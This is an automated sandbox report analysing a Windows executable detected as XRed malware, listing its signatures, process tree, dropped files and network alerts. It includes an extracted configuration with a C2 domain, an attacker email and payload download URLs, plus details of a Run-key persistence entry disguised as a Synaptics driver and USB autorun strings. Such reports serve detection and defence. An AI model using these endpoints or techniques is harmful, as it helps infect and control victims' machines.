Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1583475
MD5:eaba5b2c3b6607177112ec5f26438ba3
SHA1:d0572bad54faca6af612763c6835feb160a3dcd2
SHA256:43555b4a8bd82abd7e7b1f279b4f31afb5a230ce4246be6fda4fdd5e7263c780
Tags:exeuser-jstrosch
Infos:

Detection

XRed
Score:74
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected XRed
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Document contains an embedded VBA macro with suspicious strings
Document contains an embedded VBA with functions possibly related to ADO stream file operations
Document contains an embedded VBA with functions possibly related to HTTP operations
Document contains an embedded VBA with functions possibly related to WSH operations (process, registry, environment, or keystrokes)
Drops PE files to the document folder of the user
Machine Learning detection for dropped file
Machine Learning detection for sample
Uses dynamic DNS services
Writes many files with high entropy
AV process strings found (often used to terminate AV products)
Checks for available system drives (often done to infect USB drives)
Contains functionality to dynamically determine API calls
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops PE files to the windows directory (C:\Windows)
Drops files with a non-matching file extension (content does not match file extension)
Found dropped PE file which has not been started or loaded
Found evasive API chain (may stop execution after accessing registry keys)
Found evasive API chain checking for process token information
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May infect USB drives
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
PE file contains executable resources (Code or Archives)
PE file contains strange resources
Queries the installation date of Windows
Sample file is different than original file name gathered from version info
Sigma detected: Use Short Name Path in Command Line
Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 6428 cmdline: "C:\Users\user\Desktop\file.exe" MD5: EABA5B2C3B6607177112EC5F26438BA3)
    • ._cache_file.exe (PID: 6420 cmdline: "C:\Users\user\Desktop\._cache_file.exe" MD5: FD6057B33E15A553DDC5D9873723CE8F)
      • dxwsetup.exe (PID: 6448 cmdline: C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe MD5: EAA6B5EE297982A6A396354814006761)
    • Synaptics.exe (PID: 4136 cmdline: "C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate MD5: 7407C51DD7AC30C4D79658D991A8B5D6)
      • WerFault.exe (PID: 2548 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 4136 -s 15608 MD5: C31336C1EFC2CCB44B4326EA793040F2)
      • WerFault.exe (PID: 6128 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 4136 -s 2952 MD5: C31336C1EFC2CCB44B4326EA793040F2)
      • WerFault.exe (PID: 4428 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 4136 -s 14432 MD5: C31336C1EFC2CCB44B4326EA793040F2)
      • WerFault.exe (PID: 3180 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 4136 -s 14456 MD5: C31336C1EFC2CCB44B4326EA793040F2)
      • WerFault.exe (PID: 1500 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 4136 -s 3252 MD5: C31336C1EFC2CCB44B4326EA793040F2)
      • WerFault.exe (PID: 2836 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 4136 -s 15520 MD5: C31336C1EFC2CCB44B4326EA793040F2)
      • WerFault.exe (PID: 3776 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 4136 -s 14552 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • EXCEL.EXE (PID: 1204 cmdline: "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding MD5: 4A871771235598812032C822E6F68F19)
  • Synaptics.exe (PID: 1876 cmdline: "C:\ProgramData\Synaptics\Synaptics.exe" MD5: 7407C51DD7AC30C4D79658D991A8B5D6)
  • cleanup

Malware Configuration

Threatname: XRed

{"C2 url": "xred.mooo.com", "Email": "xredline1@gmail.com", "Payload urls": ["http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978", "https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download", "https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=1", "http://xred.site50.net/syn/SUpdate.ini", "https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=download", "https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1", "http://xred.site50.net/syn/Synaptics.rar", "https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=download", "https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1", "http://xred.site50.net/syn/SSLLibrary.dll"]}

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
file.exeJoeSecurity_XRedYara detected XRedJoe Security
    file.exeJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security

      Dropped Files

      SourceRuleDescriptionAuthorStrings
      C:\ProgramData\Synaptics\RCX8506.tmpJoeSecurity_XRedYara detected XRedJoe Security
        C:\ProgramData\Synaptics\RCX8506.tmpJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
          C:\Users\user\Documents\CZQKSDDMWR\~$cache1JoeSecurity_XRedYara detected XRedJoe Security
            C:\Users\user\Documents\CZQKSDDMWR\~$cache1JoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
              C:\ProgramData\Synaptics\Synaptics.exeJoeSecurity_XRedYara detected XRedJoe Security
                Click to see the 1 entries

                Memory Dumps

                SourceRuleDescriptionAuthorStrings
                00000000.00000000.1251479603.0000000000401000.00000020.00000001.01000000.00000003.sdmpJoeSecurity_XRedYara detected XRedJoe Security
                  00000000.00000000.1251479603.0000000000401000.00000020.00000001.01000000.00000003.sdmpJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
                    Process Memory Space: file.exe PID: 6428JoeSecurity_XRedYara detected XRedJoe Security

                      Unpacked PEs

                      SourceRuleDescriptionAuthorStrings
                      0.0.file.exe.400000.0.unpackJoeSecurity_XRedYara detected XRedJoe Security
                        0.0.file.exe.400000.0.unpackJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security

                          Sigma Signatures

                          System Summary

                          barindex
                          Sigma detected: Use Short Name Path in Command Line
                          Source: Process startedAuthor: frack113, Nasreddine Bencherchali: Data: Command: C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe, CommandLine: C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe, ParentCommandLine: "C:\Users\user\Desktop\._cache_file.exe" , ParentImage: C:\Users\user\Desktop\._cache_file.exe, ParentProcessId: 6420, ParentProcessName: ._cache_file.exe, ProcessCommandLine: C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe, ProcessId: 6448, ProcessName: dxwsetup.exe
                          Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification
                          Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\ProgramData\Synaptics\Synaptics.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\file.exe, ProcessId: 6428, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Synaptics Pointing Device Driver
                          Sigma detected: Office Macro File Creation
                          Source: File createdAuthor: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\ProgramData\Synaptics\Synaptics.exe, ProcessId: 4136, TargetFilename: C:\Users\user~1\AppData\Local\Temp\zsbKktb3.xlsm

                          Suricata Signatures

                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2025-01-02T20:28:46.292943+010020448871A Network Trojan was detected192.168.2.749730216.58.206.78443TCP
                          2025-01-02T20:28:46.342060+010020448871A Network Trojan was detected192.168.2.749731216.58.206.78443TCP
                          2025-01-02T20:28:47.366507+010020448871A Network Trojan was detected192.168.2.749739216.58.206.78443TCP
                          2025-01-02T20:28:47.388273+010020448871A Network Trojan was detected192.168.2.749742216.58.206.78443TCP
                          2025-01-02T20:28:48.475179+010020448871A Network Trojan was detected192.168.2.749749216.58.206.78443TCP
                          2025-01-02T20:28:48.480400+010020448871A Network Trojan was detected192.168.2.749750216.58.206.78443TCP
                          2025-01-02T20:28:49.566636+010020448871A Network Trojan was detected192.168.2.749760216.58.206.78443TCP
                          2025-01-02T20:28:49.573037+010020448871A Network Trojan was detected192.168.2.749761216.58.206.78443TCP
                          2025-01-02T20:28:51.082721+010020448871A Network Trojan was detected192.168.2.749783216.58.206.78443TCP
                          2025-01-02T20:28:51.094820+010020448871A Network Trojan was detected192.168.2.749782216.58.206.78443TCP
                          2025-01-02T20:28:52.108314+010020448871A Network Trojan was detected192.168.2.749797216.58.206.78443TCP
                          2025-01-02T20:28:52.131513+010020448871A Network Trojan was detected192.168.2.749796216.58.206.78443TCP
                          2025-01-02T20:28:53.145116+010020448871A Network Trojan was detected192.168.2.749805216.58.206.78443TCP
                          2025-01-02T20:28:53.150369+010020448871A Network Trojan was detected192.168.2.749806216.58.206.78443TCP
                          2025-01-02T20:28:54.045246+010020448871A Network Trojan was detected192.168.2.749816216.58.206.78443TCP
                          2025-01-02T20:28:54.045308+010020448871A Network Trojan was detected192.168.2.749815216.58.206.78443TCP
                          2025-01-02T20:28:55.072174+010020448871A Network Trojan was detected192.168.2.749831216.58.206.78443TCP
                          2025-01-02T20:28:55.086087+010020448871A Network Trojan was detected192.168.2.749832216.58.206.78443TCP
                          2025-01-02T20:28:56.208084+010020448871A Network Trojan was detected192.168.2.749840216.58.206.78443TCP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2025-01-02T20:28:46.764779+010028326171Malware Command and Control Activity Detected192.168.2.74973869.42.215.25280TCP

                          Joe Sandbox Signatures

                          Click to jump to signature section

                          Show All Signature Results

                          AV Detection

                          barindex
                          Antivirus / Scanner detection for submitted sample
                          Source: file.exeAvira: detected
                          Source: file.exeAvira: detected
                          Antivirus detection for URL or domain
                          Source: http://xred.site50.net/syn/SUpdate.ini0&Avira URL Cloud: Label: malware
                          Source: http://xred.site50.net/syn/Synaptics.rardAvira URL Cloud: Label: malware
                          Antivirus detection for dropped file
                          Source: C:\Users\user\Documents\CZQKSDDMWR\~$cache1Avira: detection malicious, Label: TR/Dldr.Agent.SH
                          Source: C:\Users\user\Documents\CZQKSDDMWR\~$cache1Avira: detection malicious, Label: W2000M/Dldr.Agent.17651006
                          Source: C:\ProgramData\Synaptics\RCX8506.tmpAvira: detection malicious, Label: TR/Dldr.Agent.SH
                          Source: C:\ProgramData\Synaptics\RCX8506.tmpAvira: detection malicious, Label: W2000M/Dldr.Agent.17651006
                          Source: C:\ProgramData\Synaptics\Synaptics.exeAvira: detection malicious, Label: TR/Dldr.Agent.SH
                          Source: C:\ProgramData\Synaptics\Synaptics.exeAvira: detection malicious, Label: W2000M/Dldr.Agent.17651006
                          Found malware configuration
                          Source: file.exeMalware Configuration Extractor: XRed {"C2 url": "xred.mooo.com", "Email": "xredline1@gmail.com", "Payload urls": ["http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978", "https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download", "https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=1", "http://xred.site50.net/syn/SUpdate.ini", "https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=download", "https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1", "http://xred.site50.net/syn/Synaptics.rar", "https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=download", "https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1", "http://xred.site50.net/syn/SSLLibrary.dll"]}
                          Multi AV Scanner detection for dropped file
                          Source: C:\ProgramData\Synaptics\RCX8506.tmpReversingLabs: Detection: 93%
                          Source: C:\ProgramData\Synaptics\Synaptics.exeReversingLabs: Detection: 92%
                          Source: C:\Users\user\Documents\CZQKSDDMWR\~$cache1ReversingLabs: Detection: 93%
                          Multi AV Scanner detection for submitted file
                          Source: file.exeReversingLabs: Detection: 92%
                          AI detected suspicious sample
                          Source: Submited SampleIntegrated Neural Analysis Model: Matched 85.8% probability
                          Machine Learning detection for dropped file
                          Source: C:\Users\user\Documents\CZQKSDDMWR\~$cache1Joe Sandbox ML: detected
                          Source: C:\ProgramData\Synaptics\RCX8506.tmpJoe Sandbox ML: detected
                          Source: C:\ProgramData\Synaptics\Synaptics.exeJoe Sandbox ML: detected
                          Machine Learning detection for sample
                          Source: file.exeJoe Sandbox ML: detected
                          Source: file.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeWindow detected: Installing Microsoft(R) DirectX(R)Welcome to setup for DirectXThe DirectX setup wizard guides you through installation of DirectX Runtime Components. Please read the following license agreement. Press the PAGE DOWN key to see the rest of the agreement. You must accept the agreement to continue the setup.MICROSOFT SOFTWARE LICENSE TERMSMICROSOFT DIRECTX END USER RUNTIMEThese license terms are an agreement between Microsoft Corporation (or based on where you live one of its affiliates) and you. Please read them. They apply to the software named above which includes the media on which you received it if any. The terms also apply to any Microsoft* updates* supplements* Internet-based services and * support servicesfor this software unless other terms accompany those items. If so those terms apply.BY USING THE SOFTWARE YOU ACCEPT THESE TERMS. IF YOU DO NOT ACCEPT THEM DO NOT USE THE SOFTWARE.If you comply with these license terms you have the rights below.1. INSTALLATION AND USE RIGHTS. You may install and use any number of copies of the software on your devices.2. SCOPE OF LICENSE. The software is licensed not sold. This agreement only gives you some rights to use the software. Microsoft reserves all other rights. Unless applicable law gives you more rights despite this limitation you may use the software only as expressly permitted in this agreement. In doing so you must comply with any technical limitations in the software that only allow you to use it in certain ways. You may not* work around any technical limitations in the software;* reverse engineer decompile or disassemble the software except and only to the extent that applicable law expressly permits despite this limitation;* make more copies of the software than specified in this agreement or allowed by applicable law despite this limitation;* publish the software for others to copy;* rent lease or lend the software;* transfer the software or this agreement to any third party; or* use the software for commercial software hosting services.3. BACKUP COPY. You may make one backup copy of the software. You may use it only to reinstall the software.4. DOCUMENTATION. Any person that has valid access to your computer or internal network may copy and use the documentation for your internal reference purposes.5. EXPORT RESTRICTIONS. The software is subject to United States export laws and regulations. You must comply with all domestic and international export laws and regulations that apply to the software. These laws include restrictions on destinations end users and end use. For additional information see www.microsoft.com/exporting.6. SUPPORT SERVICES. Because this software is as is we may not provide support services for it.7. ENTIRE AGREEMENT. This agreement and the terms for supplements updates Internet-based services and support services that you use are the entire agreement for the software and support services.8. APPLICABLE LAW.a. United States. If you acquired the s
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9672_none_d08f9da24428a513\MSVCR80.dllJump to behavior
                          Source: unknownHTTPS traffic detected: 216.58.206.78:443 -> 192.168.2.7:49730 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 216.58.206.78:443 -> 192.168.2.7:49731 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 142.250.186.129:443 -> 192.168.2.7:49740 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 142.250.186.129:443 -> 192.168.2.7:49741 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 216.58.206.78:443 -> 192.168.2.7:49749 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 216.58.206.78:443 -> 192.168.2.7:49750 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 216.58.206.78:443 -> 192.168.2.7:49760 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 216.58.206.78:443 -> 192.168.2.7:49761 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 142.250.186.129:443 -> 192.168.2.7:49784 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 216.58.206.78:443 -> 192.168.2.7:49783 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 216.58.206.78:443 -> 192.168.2.7:49782 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 216.58.206.78:443 -> 192.168.2.7:49797 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 216.58.206.78:443 -> 192.168.2.7:49796 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 216.58.206.78:443 -> 192.168.2.7:49840 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 142.250.186.129:443 -> 192.168.2.7:49839 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 142.250.186.129:443 -> 192.168.2.7:49841 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 216.58.206.78:443 -> 192.168.2.7:49842 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 216.58.206.78:443 -> 192.168.2.7:49850 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 216.58.206.78:443 -> 192.168.2.7:49851 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 216.58.206.78:443 -> 192.168.2.7:49883 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 142.250.186.129:443 -> 192.168.2.7:49884 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 142.250.186.129:443 -> 192.168.2.7:49885 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 216.58.206.78:443 -> 192.168.2.7:49886 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 216.58.206.78:443 -> 192.168.2.7:49927 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 142.250.186.129:443 -> 192.168.2.7:49926 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 142.250.186.129:443 -> 192.168.2.7:49929 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 216.58.206.78:443 -> 192.168.2.7:49930 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 216.58.206.78:443 -> 192.168.2.7:49949 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 216.58.206.78:443 -> 192.168.2.7:49951 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 142.250.186.129:443 -> 192.168.2.7:49969 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 142.250.186.129:443 -> 192.168.2.7:49971 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 216.58.206.78:443 -> 192.168.2.7:49981 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 216.58.206.78:443 -> 192.168.2.7:49984 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 216.58.206.78:443 -> 192.168.2.7:49991 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 216.58.206.78:443 -> 192.168.2.7:49995 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 216.58.206.78:443 -> 192.168.2.7:50002 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 142.250.186.129:443 -> 192.168.2.7:50006 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 216.58.206.78:443 -> 192.168.2.7:50005 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 216.58.206.78:443 -> 192.168.2.7:50015 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 216.58.206.78:443 -> 192.168.2.7:50018 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 216.58.206.78:443 -> 192.168.2.7:50060 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 216.58.206.78:443 -> 192.168.2.7:50059 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 216.58.206.78:443 -> 192.168.2.7:50071 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 216.58.206.78:443 -> 192.168.2.7:50070 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 216.58.206.78:443 -> 192.168.2.7:50094 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 216.58.206.78:443 -> 192.168.2.7:50097 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 216.58.206.78:443 -> 192.168.2.7:50128 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 216.58.206.78:443 -> 192.168.2.7:50134 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 142.250.186.129:443 -> 192.168.2.7:50133 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 216.58.206.78:443 -> 192.168.2.7:50139 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 216.58.206.78:443 -> 192.168.2.7:50141 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 216.58.206.78:443 -> 192.168.2.7:50153 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 216.58.206.78:443 -> 192.168.2.7:50160 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 216.58.206.78:443 -> 192.168.2.7:50178 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 142.250.186.129:443 -> 192.168.2.7:50177 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 142.250.186.129:443 -> 192.168.2.7:50180 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 216.58.206.78:443 -> 192.168.2.7:50179 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 216.58.206.78:443 -> 192.168.2.7:50189 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 216.58.206.78:443 -> 192.168.2.7:50188 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 216.58.206.78:443 -> 192.168.2.7:50194 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 142.250.186.129:443 -> 192.168.2.7:50202 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 216.58.206.78:443 -> 192.168.2.7:50206 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 216.58.206.78:443 -> 192.168.2.7:50207 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 216.58.206.78:443 -> 192.168.2.7:50219 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 216.58.206.78:443 -> 192.168.2.7:50218 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 142.250.186.129:443 -> 192.168.2.7:50223 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 142.250.186.129:443 -> 192.168.2.7:50225 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 216.58.206.78:443 -> 192.168.2.7:50233 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 216.58.206.78:443 -> 192.168.2.7:50234 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 216.58.206.78:443 -> 192.168.2.7:50238 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 216.58.206.78:443 -> 192.168.2.7:50239 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 142.250.186.129:443 -> 192.168.2.7:50240 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 216.58.206.78:443 -> 192.168.2.7:50244 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 142.250.186.129:443 -> 192.168.2.7:50245 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 216.58.206.78:443 -> 192.168.2.7:50253 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 142.250.186.129:443 -> 192.168.2.7:50264 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 216.58.206.78:443 -> 192.168.2.7:50263 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 142.250.186.129:443 -> 192.168.2.7:50262 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 216.58.206.78:443 -> 192.168.2.7:50265 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 216.58.206.78:443 -> 192.168.2.7:50272 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 142.250.186.129:443 -> 192.168.2.7:50274 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 216.58.206.78:443 -> 192.168.2.7:50273 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 142.250.186.129:443 -> 192.168.2.7:50275 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 216.58.206.78:443 -> 192.168.2.7:50278 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 142.250.186.129:443 -> 192.168.2.7:50284 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 216.58.206.78:443 -> 192.168.2.7:50289 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 216.58.206.78:443 -> 192.168.2.7:50290 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 216.58.206.78:443 -> 192.168.2.7:50295 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 216.58.206.78:443 -> 192.168.2.7:50297 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 216.58.206.78:443 -> 192.168.2.7:50299 version: TLS 1.2
                          Source: Binary string: wextract.pdb source: file.exe, ._cache_file.exe.0.dr
                          Source: Binary string: dsetup32.pdb source: SET8EBB.tmp.6.dr
                          Source: Binary string: dxwsetup.pdb source: ._cache_file.exe, 00000002.00000003.1274116896.000000000246A000.00000004.00000020.00020000.00000000.sdmp, dxwsetup.exe, 00000006.00000000.1278152234.00000000002C1000.00000020.00000001.01000000.00000007.sdmp
                          Source: Binary string: wextract.pdbU source: file.exe, ._cache_file.exe.0.dr
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile opened: z:Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile opened: x:Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile opened: v:Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile opened: t:Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile opened: r:Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile opened: p:Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile opened: n:Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile opened: l:Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile opened: j:Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile opened: h:Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile opened: f:Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile opened: b:Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile opened: y:Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile opened: w:Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile opened: u:Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile opened: s:Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile opened: q:Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile opened: o:Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile opened: m:Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile opened: k:Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile opened: i:Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile opened: g:Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile opened: e:Jump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeFile opened: c:
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile opened: a:Jump to behavior
                          Source: file.exe, 00000000.00000000.1251479603.0000000000401000.00000020.00000001.01000000.00000003.sdmpBinary or memory string: [autorun]
                          Source: file.exe, 00000000.00000000.1251479603.0000000000401000.00000020.00000001.01000000.00000003.sdmpBinary or memory string: [autorun]
                          Source: file.exe, 00000000.00000000.1251479603.0000000000401000.00000020.00000001.01000000.00000003.sdmpBinary or memory string: autorun.inf
                          Source: file.exeBinary or memory string: [autorun]
                          Source: file.exeBinary or memory string: [autorun]
                          Source: file.exeBinary or memory string: autorun.inf
